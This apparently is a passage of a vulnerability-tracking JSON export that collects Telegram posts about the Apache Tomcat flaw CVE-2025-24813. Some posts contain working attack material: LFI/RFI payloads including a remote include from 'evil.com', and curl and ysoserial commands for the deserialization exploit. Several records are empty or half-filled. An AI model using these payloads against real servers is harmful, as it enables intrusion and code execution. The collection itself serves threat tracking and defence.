\n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aExample PoC for CVE-2025-24813 (Tomcat RCE)\nURL\uff1ahttps://github.com/Walekmw/Anydesk-Exploit-CVE-2025-12654-RCE-Builder\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-09-14T21:31:42.000000Z"}, {"uuid": "8a5d3f77-097d-4363-b7da-2f101bae7b7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/NinjaSec/298", "content": "Certainly! Below is a curated list of critical CVEs from 2025 that involve code execution, browser bypasses, and internal service exposure. These are provided strictly for educational purposes to aid in understanding and mitigating such vulnerabilities.\n\n\n\ud83d\udd10 Critical CVEs from 2025 (Educational Use Only)\n\n1. CVE-2025-47241\n\nDescription: Whitelist bypass in the Browser Use automation tool allows attackers to access internal services via crafted URLs.\n\nCVSS Score: 9.3\n\nReference: \n\n\n\n2. CVE-2025-25014\n\nDescription: Prototype pollution in Kibana leads to arbitrary code execution through crafted HTTP requests to machine learning and reporting endpoints.\n\nCVSS Score: 9.1\n\nReference: \n\n\n\n3. CVE-2025-29927\n\nDescription: Authorization bypass in Next.js middleware allows attackers to access protected routes by manipulating internal headers.\n\nCVSS Score: 9.1\n\nReference: \n\n\n\n4. CVE-2025-24813\n\nDescription: \n\nCVSS Score: \n\nReference: \n\n\n\n5. CVE-2025-2783\n\nDescription: \n\nCVSS Score: High\n\nReference: \n\n\n\n6. CVE-2025-2636\n\nDescription: \n\nCVSS Score: High\n\nReference: \n\n\n\n7. CVE-2025-2505\n\nDescription: \n\nCVSS Score: High\n\nReference: \n\n\n\n8. CVE-2025-2746 &amp; CVE-2025-2747\n\nDescription: \n\nCVSS Score: \n\nReference: \n\n\n\n9. CVE-2025-3066\n\nDescription: \n\nCVSS Score: High\n\nReference: \n\n\n\n10. CVE-2025-46728\n\nDescription: Denial of Service vulnerability in cpp-httplib, potentially exposing servers to service disruptions.\n\nCVSS Score: High\n\nReference: \n\n#HackersFactory", "creation_timestamp": "2025-05-19T12:58:14.000000Z"}, {"uuid": "7ff0c5f4-4141-4d3f-9fea-ecec504bd7fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/realcodeb0ss/38", "content": "", "creation_timestamp": "2025-06-13T18:28:24.000000Z"}, {"uuid": "416a06cf-0905-4d58-a918-af0c89e4de49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/z0Id2f_ZaBvbK6vMIcrb6djLnnbaaLvumIJZCatYfMDdGts", "content": "", "creation_timestamp": "2025-08-31T15:00:06.000000Z"}, {"uuid": "a5633a15-a5a9-41ec-8c08-7a653f5a8978", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/zero_day_uz/506", "content": "CVE-2025-24813\n*\nTomcat RCE - POC exploit", "creation_timestamp": "2025-09-19T03:56:04.000000Z"}, {"uuid": "f48d8225-c6d3-4048-9fc6-b7b62613a035", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/TengkorakCyberCrewzz/837", "content": "Hackers Actively Exploit Apache Tomcat Servers via CVE-2025-24813 \u2013 Patch Now \u2013 gbhackers.com\n\nFri, 21 Mar 2025 19:11:23", "creation_timestamp": "2025-03-21T12:04:33.000000Z"}, {"uuid": "7fb2844e-f086-4ba4-85ed-b26208e3ebb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/ihOkiwe6OhHQI2TZ1X3ddAGzem4yCBX0q_BNzRmX2HDnWoU", "content": "", "creation_timestamp": "2025-08-06T15:00:07.000000Z"}, {"uuid": "5f139b35-b5c5-4829-b8ea-e7c595e92460", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/cybersecplayground/130", "content": "\ud83d\udea8 Critical Security Alert: CVE-2025-24813 \ud83d\udea8\n\n\ud83d\udc80 Apache Tomcat Remote Code Execution &amp; Data Leak \ud83d\udc80\n\n\ud83d\udd25 A newly discovered flaw in Apache Tomcat allows attackers to execute arbitrary code and leak sensitive data. Immediate patching is required!\n\n\ud83d\udcca Affected Services:\n10.7M+ Apache Tomcat servers are exposed yearly via public scanning tools.\n\n\ud83d\udd0e Track vulnerable instances\n\ud83d\udd75\ufe0f Queries\n\nHunter: product.name=\"Apache Tomcat\"\nFOFA: product=\"APACHE-Tomcat\"\nShodan: product:\"Apache Tomcat\"\n\n\ud83d\udd16 Reference &amp; Mitigation:\n\ud83d\udcf0 Security Advisory\n\ud83d\udcdc Apache Security Thread\n\n\ud83d\udca1 Defensive Measures:\n\u2705 Update to the latest Apache Tomcat version\n\u2705 Restrict access to management interfaces\n\u2705 Harden configurations and enforce WAF rules\n\n\u26a0\ufe0f Unpatched servers remain highly vulnerable\u2014act now!\n\n\ud83d\udd17 Stay ahead in cybersecurity\u2014join us! @cybersecplayground \ud83d\ude80", "creation_timestamp": "2025-03-12T08:11:34.000000Z"}, {"uuid": "51c9faf2-e2b9-477d-abb7-a6e539f013ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/cybersecplayground/138", "content": "\ud83d\udd0d LFI via GET Request - Local File Inclusion Exploit\n\nIf you find an endpoint vulnerable to LFI (Local File Inclusion), try this payload:\n\n/shell.jsp?cmd=cat+%2Fetc%2Fpasswd\n\n\u2705 Why this works?\ncat /etc/passwd reads system user details.\n%2F is URL encoding for / (to bypass filters).\nWorks on misconfigured web applications allowing direct command execution.\n\n\ud83d\udd25 More Payloads to Try:\n?file=../../../../../../etc/passwd\n?page=../../../../../../../var/log/apache2/access.log\n?inc=http://evil.com/shell.txt (RFI possibility!)\n?cmd=ls+-la+/var/www/html/\n\n\ud83d\udca1 Pro Tips:\nTest null bytes %00 and encoding tricks.\nTry log poisoning for RCE.\nIf 403 is encountered, bypass with ..%2f..%2f..%2f sequences.\n\n\ud83d\udea8 Vulnerable Software Alert:\nCVE-2025-24813 - Apache Tomcat RCE via LFI\n\n\ud83d\udd17 Reference\n\n\ud83d\udd14 Stay updated with more Bug Bounty tips at @cybersecplayground!\n\n#BugBounty #LFI #RCE #Security #Pentesting \ud83d\ude80", "creation_timestamp": "2025-03-17T08:35:46.000000Z"}, {"uuid": "ed279ba9-ddf0-48af-bfd0-f5b29932b11a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/OoyvOxhDepv_VW-3kj9cRIaGdoLcZyggYa8Ds5zdnxyRhfM", "content": "", "creation_timestamp": "2025-08-12T03:00:06.000000Z"}, {"uuid": "05de0267-aef6-4065-af0f-95fbb97fad1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/o8ZKoWV2Y_A2XRg1P8qW1kiSLgUFj0IHGqQJ6A5ARyKaU-0", "content": "", "creation_timestamp": "2025-07-29T03:00:05.000000Z"}, {"uuid": "7cb364d0-85c2-499c-87aa-f566d42e7ced", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/claytechsolution/240", "content": "The Hacker News\nApache Tomcat Vulnerability Actively Exploited Just 30 Hours After Public Disclosure\n\nA recently disclosed security flaw impacting Apache Tomcat has come under active exploitation in the wild following the release of a public proof-of-concept (PoC) a mere 30 hours after public disclosure.\nThe vulnerability, tracked as CVE-2025-24813, affects the below versions -\n\nApache Tomcat 11.0.0-M1 to 11.0.2\nApache Tomcat 10.1.0-M1 to 10.1.34\nApache Tomcat 9.0.0-M1 to 9.0.98\n\nIt concerns a", "creation_timestamp": "2025-03-17T20:45:24.000000Z"}, {"uuid": "a9cd18fb-c248-4c74-a033-998f3ca73ef9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/poxek/5397", "content": "CVE-2025-24813: RCE \u0432 Apache Tomcat \u0447\u0435\u0440\u0435\u0437 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044e\n#CVE #RCE #Apache #Tomcat #deser\n\nApache \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0430 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435 \u043e \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Tomcat, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0447\u0435\u0440\u0435\u0437 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0441\u0435\u0441\u0441\u0438\u0439. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435.\n\n\u27a1\ufe0f\u0422\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0434\u0435\u0442\u0430\u043b\u0438\n\n\u0417\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438:\n\u25aa\ufe0f9.0.0.M1-9.0.98\n\u25aa\ufe0f10.1.0-M1-10.1.34\n\u25aa\ufe0f11.0.0-M1-11.0.2\n\n\u27a1\ufe0f\u041c\u0435\u0445\u0430\u043d\u0438\u0437\u043c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438\n\n\u0423\u0441\u043b\u043e\u0432\u0438\u044f \u0434\u043b\u044f \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u0430\u0442\u0430\u043a\u0438:\n1.\u0412\u043a\u043b\u044e\u0447\u0435\u043d\u044b \u0437\u0430\u043f\u0438\u0441\u0438 \u0432 default servlet (disabled by default)\n2.\u041f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0430 \u0447\u0430\u0441\u0442\u0438\u0447\u043d\u044b\u0445 PUT-\u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 (enabled by default)\n3.\u0421\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u0441\u0435\u0441\u0441\u0438\u0439 \u0432 \u0444\u0430\u0439\u043b\u043e\u0432\u0443\u044e \u0441\u0438\u0441\u0442\u0435\u043c\u0443\n4.\u0426\u0435\u043b\u0435\u0432\u043e\u0439 URL \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u0434\u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0435\u0439 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u0439 \u043e\u0431\u043b\u0430\u0441\u0442\u0438\n\n\u041f\u043e\u0448\u0430\u0433\u043e\u0432\u044b\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0430\u0442\u0430\u043a\u0438:\n\n\u042d\u0442\u0430\u043f 1: \u0417\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430\nPUT /app/sessions/malicious.ser HTTP/1.1\nContent-Range: bytes 0-1023/*\nContent-Length: 1024\n\n[Serialized Java payload with malicious code]\n\u042d\u0442\u0430\u043f 2: \u0421\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u0432 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 \u0441\u0435\u0441\u0441\u0438\u0439\nTomcat \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u0442 \u0444\u0430\u0439\u043b \u0432 session storage directory \u043d\u0430 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u0430.\n\u042d\u0442\u0430\u043f 3: \u0414\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0449\u0435\u043d\u0438\u0438 \u043a \u0441\u0435\u0441\u0441\u0438\u0438\n\u041f\u0440\u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u0441\u0435\u0441\u0441\u0438\u0438 Tomcat \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0443\u0435\u0442 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0444\u0430\u0439\u043b\u0430, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e Java-\u043a\u043e\u0434\u0430.\n\n\u0422\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0441\u0443\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438\n\nPath Equivalence:\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u0430 \u043d\u0430 \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e\u0439 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 \u043f\u0443\u0442\u0435\u0439 \u0444\u0430\u0439\u043b\u043e\u0432 \u0432 default servlet. \u0410\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0439 \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c path traversal \u0434\u043b\u044f \u0437\u0430\u043f\u0438\u0441\u0438 \u0432 security-sensitive \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438.\n\n\u0414\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u0431\u0435\u0437 \u0432\u0430\u043b\u0438\u0434\u0430\u0446\u0438\u0438:\nTomcat \u043d\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u043f\u0435\u0440\u0435\u0434 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0435\u0439, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0447\u0435\u0440\u0435\u0437 Java deserialization gadgets.\n\n\u041f\u0440\u0438\u043c\u0435\u0440\u044b \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438\n# \u041f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0437\u0430\u043f\u0438\u0441\u0438\ncurl -X PUT \"http://target:8080/app/sessions/test.txt\" \\\n     -H \"Content-Range: bytes 0-4/*\" \\\n     -d \"test\"\n\n# \u041f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u0437\u0430\u043f\u0438\u0441\u0438 \u0444\u0430\u0439\u043b\u0430\ncurl \"http://target:8080/app/sessions/test.txt\"\n\u0421\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438:\n// \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 ysoserial \u0434\u043b\u044f \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 payload\njava -jar ysoserial.jar CommonsCollections6 \"calc.exe\" &gt; payload.ser\n\n# \u0417\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0447\u0435\u0440\u0435\u0437 PUT\ncurl -X PUT \"http://target:8080/app/sessions/malicious.ser\" \\\n     -H \"Content-Range: bytes 0-$(wc -c &lt; payload.ser)/*\" \\\n     --data-binary @payload.ser\n\n\u27a1\ufe0f\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u0430\u0442\u0430\u043a\n\n\u0418\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438:\n\u25aa\ufe0f\u041d\u0435\u043e\u0431\u044b\u0447\u043d\u044b\u0435 PUT-\u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043a \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044f\u043c \u0441\u0435\u0441\u0441\u0438\u0439\n\u25aa\ufe0f\u0424\u0430\u0439\u043b\u044b \u0441 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0435\u043c .ser \u0432 \u043d\u0435\u043e\u0436\u0438\u0434\u0430\u043d\u043d\u044b\u0445 \u043c\u0435\u0441\u0442\u0430\u0445\n\u25aa\ufe0f\u0410\u043d\u043e\u043c\u0430\u043b\u044c\u043d\u0430\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0432 \u043b\u043e\u0433\u0430\u0445\n\u25aa\ufe0f\u0412\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432 \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 Tomcat\n\n\u041c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433:\n# \u041f\u043e\u0438\u0441\u043a \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 PUT-\u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u0432 \u043b\u043e\u0433\u0430\u0445\ngrep \"PUT.*sessions\" /var/log/tomcat/access.log\n\n# \u041f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u0444\u0430\u0439\u043b\u043e\u0432 \u0441\u0435\u0441\u0441\u0438\u0439\nfind /opt/tomcat/work -name \"*.ser\" -type f -ls\n\u27a1\ufe0f\u0417\u0430\u0449\u0438\u0442\u043d\u044b\u0435 \u043c\u0435\u0440\u044b\n\n1. \u041d\u0435\u043c\u0435\u0434\u043b\u0435\u043d\u043d\u044b\u0435 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f:\n\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439:\n\u25aa\ufe0f9.0.99+\n\u25aa\ufe0f10.1.35+\n\u25aa\ufe0f11.0.3+\n\n2. \u0412\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435 \u043c\u0435\u0440\u044b \u0437\u0430\u0449\u0438\u0442\u044b:\n\n\n    default\n    org.apache.catalina.servlets.DefaultServlet\n    \n        readonly\n        true\n    \n\n3. \u041e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 \u0447\u0430\u0441\u0442\u0438\u0447\u043d\u044b\u0445 PUT-\u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432:\n\n    default\n    \n        allowPartialPut\n        false\n    \n\n4. \u0414\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u043c\u0435\u0440\u044b \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438:\n\u25aa\ufe0f\u041d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430 WAF \u0434\u043b\u044f \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 PUT-\u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432\n\u25aa\ufe0f\u041e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u043f\u0440\u0430\u0432 \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0434\u043b\u044f Tomcat\n\u25aa\ufe0f\u041c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0439 \u0441\u0435\u0441\u0441\u0438\u0439\n\u25aa\ufe0f\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0432\u043d\u0435\u0448\u043d\u0435\u0433\u043e session storage (Redis, DB)\n\n\ud83c\udf1a @poxek | \ud83c\udf1a \u0411\u043b\u043e\u0433 | \ud83d\udcfa YT | \ud83d\udcfa RT | \ud83d\udcfa VK", "creation_timestamp": "2025-08-01T12:58:43.000000Z"}, {"uuid": "c386a018-afe8-45cc-a12c-c89d8965017a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/xDpkA19THVkjR0nTyl_NpwrUs0WL1wYIsC2SdgiOaacVjts", "content": "", "creation_timestamp": "2025-07-07T15:00:07.000000Z"}, {"uuid": "ff816cdf-3bfb-47f0-9914-978442bc6283", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/ap_security/810", "content": "#pentest\n\nApache Tomcat (CVE-2025-24813)\n\nRCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2025-24813 \u0431\u044b\u043b\u0430 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0430 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430\u043c\u0438 Apache \u043d\u0430 \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435. \u0421\u043e\u043e\u0431\u0449\u0430\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 Apache Tomcat \u0432\u0435\u0440\u0441\u0438\u0439 11.0.0-M1 - 11.0.2, 10.1.0-M1 - 10.1.34 \u0438 9.0.0.M1 - 9.0.98. \u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u043b\u0438, \u0447\u0442\u043e \u043f\u0440\u0438 \u0441\u043e\u0431\u043b\u044e\u0434\u0435\u043d\u0438\u0438 \u0440\u044f\u0434\u0430 \u0443\u0441\u043b\u043e\u0432\u0438\u0439 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c \u0438\u043b\u0438 \u0432\u043d\u0435\u0434\u0440\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0432 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0430\u0436\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b.\n\n\u0421 \u0441\u0430\u043c\u0438\u043c \u0436\u0435 PoC \u043c\u043e\u0436\u043d\u043e \u043e\u0437\u043d\u0430\u043a\u043e\u043c\u0438\u0442\u044c\u0441\u044f \u043f\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u0441\u0441\u044b\u043b\u043a\u0435.", "creation_timestamp": "2025-03-22T10:58:59.000000Z"}, {"uuid": "f5d4bbaf-32af-4842-943c-b1f249d59c03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/D0NXyM_985baSNIubq7MpndWYcs-5k6ZzZtJb0P7Z8z5aBw", "content": "", "creation_timestamp": "2025-07-12T09:00:04.000000Z"}, {"uuid": "2720e4fa-27ad-4855-88f6-0fb2b455c154", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/itsec_news/5519", "content": "\u200b\u26a1\ufe0f\u0414\u0432\u0443\u0445\u044d\u0442\u0430\u043f\u043d\u0430\u044f \u0430\u0442\u0430\u043a\u0430 \u043d\u0430 Apache Tomcat \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u0430\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0442\u044c \u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0431\u0435\u0437 \u043f\u0430\u0440\u043e\u043b\u044f\n\n\ud83d\udcac \u041d\u0435\u0434\u0430\u0432\u043d\u043e \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Apache Tomcat \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u043b\u0430\u0441\u044c \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0432\u0441\u0435\u0433\u043e \u0447\u0435\u0440\u0435\u0437 30 \u0447\u0430\u0441\u043e\u0432 \u043f\u043e\u0441\u043b\u0435 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0433\u043e \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044f \u0438 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438 PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0430\u044f \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 